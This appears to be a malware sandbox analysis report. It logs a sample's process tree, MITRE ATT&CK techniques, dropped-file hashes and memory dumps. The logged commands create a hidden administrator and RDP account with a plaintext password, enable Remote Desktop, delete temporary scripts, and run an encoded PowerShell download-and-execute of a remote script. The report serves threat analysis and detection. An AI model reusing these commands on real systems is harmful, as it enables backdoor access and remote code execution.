    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2188
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2076
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2924
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3456
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2232
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2960

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2664
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:3160

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc fJKVT25K /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4264
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2552
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc fJKVT25K /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc fJKVT25K /add
    3⤵
    PID:1300

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4620
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:4784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:868

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" OAILVCNY$ /ADD
1⤵
PID:4856
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" OAILVCNY$ /ADD
  2⤵
  PID:1940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" OAILVCNY$ /ADD
    3⤵
    PID:4104

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:3664
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:832

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc fJKVT25K
1⤵
PID:4272
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc fJKVT25K
  2⤵
  PID:2444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc fJKVT25K
    3⤵
    PID:1624

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3308
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:888
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4996

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4784
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3464

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3556
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8
1⤵
PID:4684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1DA5.tmp

Filesize
1KB

MD5
72652ffb8bcdea2bad39b231e43a8b19

SHA1
eed1ea5b3a5280a768c3793264bed850b1700f70

SHA256
eb80386aea281c1eea0f04d05721ad308b9717963c06fbcf30ff6a3289304ed9

SHA512
489f5e9c8bf0456bd7071b70c191ebaf80e132bb54a4e730f4da81cd2c5b3c180c6408aa8be6c6064f375d7d7fc833ec528d2fbd46bcaadeb31996a2cfe43d82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pzkt2yrc.gct.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qwybtoh2\qwybtoh2.dll

Filesize
3KB

MD5
83e82557ac761fb78ed6a96e337e7df0

SHA1
3a1db74f991928b56d6bced8de70721a284a3fbf

SHA256
07c99860b5270c8f8a06169ce589502614a861a3cd9e7afacd97c4aae68def1f

SHA512
958c992a278a59b15ad8d6ace172534bedc687cd4fc0a2f26dcdc1b64b9a0a861b074d3473ce1867bf4b613e2fe167e7deddab307e786457345990f0c00cd10c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
b898b51a4248bca6b7845652bdc104c4

SHA1
7f8b2d9b32ac9cff983a7f9f88daf741db5bfb27

SHA256
156c6af2b92ae424573f6965b20b666ba26a9863e96aa2a799c32e386e9eb037

SHA512
119b7eefa328e50325511090fbcb5ea1b41b74be6e11fd6e87339eea6f2a454715afa21920bd91e176019e19f0a8899406f52edbc6099eed394d466b85870031

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
b7df367405df1d63dd0b77952f864d39

SHA1
0a4ead8259be4064ee7403833749bcb5a7464d72

SHA256
57214113a306cb06d2f41b4092c0c0ad3945ee7f5a8cc9381cfb4ba9ac2d8fc6

SHA512
8f2edf67b7d832255c41db8169b0e26b91e0082fbd1be68d3ee090067071bd7003605fb4aed450c9507541f0c39312c5bba6998320a26423354217d90d5408f4

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5cfa3b3e19ba458fc1459abd524532fd

SHA1
24b8d9f57c1a10b58b6962dcfc21405a6fd0b756

SHA256
b5e776f84f8f01fcc1fb822ff5612afe62097bf367ced2187fda0b5bf3d652ee

SHA512
3713961ce9a8edacc91acbf3958e190026bf9a7736fa1ee5b9dbfda9c58a72cfeb04c3699314339ee560bf7f97020abe08f692635b942c2b3ecafb1679c50b4b

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIA295.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwybtoh2\CSCC7D63F4041F14100A73C23754AA79A6.TMP

Filesize
652B

MD5
722bb802376f47b373b4dff0d0f74cbd

SHA1
ceb91be3330fb396caf7bf5ce045f8cbe466be45

SHA256
b304fcbebdb02643582fdb979649be54611671bbc9b24e71c1d32f6d2c07cbd5

SHA512
5b869ceb3331cf50ccb1c67b76cc6ccc04828ae8b7bcad5d361a2e66341744643888b4d4d4a58d0b2f99dadf93d6c8fd3113da6760551c1b6e4ff5b6e9051f1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwybtoh2\qwybtoh2.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwybtoh2\qwybtoh2.cmdline

Filesize
369B

MD5
9866244c5f2192c3d56ea3832906fe86

SHA1
f28778ea4d4121dd8a3167030a382425ec88f7d1

SHA256
bab638242cf1adc81faa3990bfc738c911ea410880e3ef604f5312f3a1c73662

SHA512
d458c3536601965a6b1b2069764ad41a43f1fea8e94c4b17ea1f9d4a5cff811503ee7af090d4d7bcc8f1b46ed822c273b5f531a8c2c8f39e4925675ff7e0fa7e

Download Submit
memory/876-50-0x000001B5ED800000-0x000001B5ED810000-memory.dmp

Filesize
64KB

Download
memory/876-49-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/876-78-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/876-51-0x000001B5ED800000-0x000001B5ED810000-memory.dmp

Filesize
64KB

Download
memory/1752-102-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/1752-147-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/1752-114-0x000002033E800000-0x000002033E810000-memory.dmp

Filesize
64KB

Download
memory/1752-104-0x000002033E800000-0x000002033E810000-memory.dmp

Filesize
64KB

Download
memory/1752-103-0x000002033E800000-0x000002033E810000-memory.dmp

Filesize
64KB

Download
memory/2300-64-0x0000022A6FC70000-0x0000022A6FC80000-memory.dmp

Filesize
64KB

Download
memory/2300-62-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/2300-65-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4516-80-0x00007FF83B470000-0x00007FF83B489000-memory.dmp

Filesize
100KB

Download
memory/4516-148-0x000002A4D15F0000-0x000002A4D1600000-memory.dmp

Filesize
64KB

Download
memory/4516-63-0x000002A4D15F0000-0x000002A4D1600000-memory.dmp

Filesize
64KB

Download
memory/4516-52-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4516-152-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4516-151-0x00007FF83B470000-0x00007FF83B489000-memory.dmp

Filesize
100KB

Download
memory/4516-67-0x000002A4D15F0000-0x000002A4D1600000-memory.dmp

Filesize
64KB

Download
memory/4516-15-0x000002A4D38A0000-0x000002A4D38C2000-memory.dmp

Filesize
136KB

Download
memory/4516-37-0x000002A4D3D00000-0x000002A4D3E76000-memory.dmp

Filesize
1.5MB

Download
memory/4516-38-0x000002A4D4090000-0x000002A4D429A000-memory.dmp

Filesize
2.0MB

Download
memory/4516-19-0x000002A4D15F0000-0x000002A4D1600000-memory.dmp

Filesize
64KB

Download
memory/4516-82-0x000002A4D15F0000-0x000002A4D1600000-memory.dmp

Filesize
64KB

Download
memory/4516-7-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4516-33-0x000002A4D3890000-0x000002A4D3898000-memory.dmp

Filesize
32KB

Download
memory/4516-14-0x000002A4D15F0000-0x000002A4D1600000-memory.dmp

Filesize
64KB

Download
memory/4840-3-0x00000201B0A30000-0x00000201B0A40000-memory.dmp

Filesize
64KB

Download
memory/4840-2-0x00000201B0A30000-0x00000201B0A40000-memory.dmp

Filesize
64KB

Download
memory/4840-4-0x00000201B0A30000-0x00000201B0A40000-memory.dmp

Filesize
64KB

Download
memory/4840-36-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4840-0-0x00000201C9760000-0x00000201C9B86000-memory.dmp

Filesize
4.1MB

Download
memory/4840-1-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4840-39-0x00000201B0A30000-0x00000201B0A40000-memory.dmp

Filesize
64KB

Download
memory/4840-154-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4932-68-0x000001FE7BAD0000-0x000001FE7BAE0000-memory.dmp

Filesize
64KB

Download
memory/4932-66-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download
memory/4932-79-0x00007FF82D8A0000-0x00007FF82E361000-memory.dmp

Filesize
10.8MB

Download